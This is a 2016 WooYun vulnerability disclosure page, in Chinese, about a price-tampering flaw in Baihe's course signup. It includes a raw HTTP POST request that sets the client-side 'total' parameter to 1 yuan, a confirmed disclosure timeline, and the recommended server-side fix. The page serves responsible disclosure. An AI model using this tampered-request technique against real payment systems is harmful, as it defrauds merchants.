当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170949

漏洞标题:百合网支付漏洞(各种泡妞秘笈培训1元购)

相关厂商:百合网

漏洞作者: 专业种田

提交时间:2016-01-18 21:17

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-21: 厂商已经确认,细节仅向厂商公开
2016-01-31: 细节向核心白帽子及相关领域专家公开
2016-02-10: 细节向普通白帽子公开
2016-02-20: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

福利同学们
1. 实战,在理论基础掌握的基础上,导师手把手带领学员实战,只有“下水游泳”才能真的学会这项技能
2. 导师先示范给学员看,并让学员加入其中,然后让学员自己尝试搭讪
省略.......
好吸引人呀

详细说明:

哇,是不是如图那么漂亮的妹子教呀?

baihe2002.png


下单操作时可以修改价格,导致几千元的培训1元任意购买

POST /index.php?g=course&m=pcindex&a=signup HTTP/1.1
Host: zixun.baihe.com
Proxy-Connection: keep-alive
Content-Length: 83
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://zixun.baihe.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://zixun.baihe.com/index.php?g=course&m=pcindex&a=signupform&id=105
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: 
course_id=105&gender=0&name=admin&seats=1&total=1&phone=14778891111&register=329503


修改价格参数total为1元。

漏洞证明:

baihe2001.png

修复方案:

判断价格,不从客户端接收。

版权声明:转载请注明来源 专业种田@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-21 12:38

厂商回复:

谢谢

最新状态:

暂无